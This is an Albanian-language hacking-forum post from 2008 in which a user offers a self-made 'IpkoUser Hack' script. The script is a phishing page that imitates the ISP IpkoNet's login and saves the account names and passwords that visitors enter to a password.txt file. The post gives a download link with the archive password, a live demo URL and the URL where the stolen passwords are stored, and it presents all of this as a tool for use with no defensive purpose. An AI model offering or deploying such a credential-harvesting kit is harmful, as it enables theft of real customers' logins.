Would you like to react to this message? Create an account in a few clicks or log in to continue.


 
ForumForum  GalleryGallery  KėrkoKėrko  Latest imagesLatest images  RegjistrohuRegjistrohu  identifikimiidentifikimi  

 

 IpkoUser Hack

Shko poshtė 
AutoriMesazh
ReAlKiNg
Xx|♠| BaBuShii |♠|xX
Xx|♠| BaBuShii |♠|xX
ReAlKiNg


Male Numri i postimeve : 150
Emri : Emri :B3$$! Profesioni: Hacking -->>> Location--->> Hacking & Futbolli
Vendodhja : Ana Shmaiit Te Babadimri.!!
Registration date : 16/02/2008

IpkoUser Hack Empty
MesazhTitulli: IpkoUser Hack   IpkoUser Hack Icon_minitimeSun Feb 17, 2008 3:37 pm

--------------------------------------------------------------------------------

Nje menyr e leht me hacku nje user t'IpkoNet-it osht me kit script qi e kum ba vet un

passi qi ti uploadojm fajllat n'FTP
dhe e shperndajm webin
kush e shkrun accountin dhe passwordin n'faqe at'her passwordi ruhet te file password.txt

Download:

Kodi:
http://conndor.net/ipkohack.rarPassword:

Kodi:
www.conndor.netDemo:

Kodi:
http://kookteam.altervista.org/ipkohack/pra tash ktu passwordi ruhet te:

Kodi:
http://kookteam.altervista.org/ipkohack/password.txt
Mbrapsht nė krye Shko poshtė
http://www.vs-team.org
 
IpkoUser Hack
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
 :: ......::|| Hacking & Security ||::...... :: Hacking-
Kėrce tek: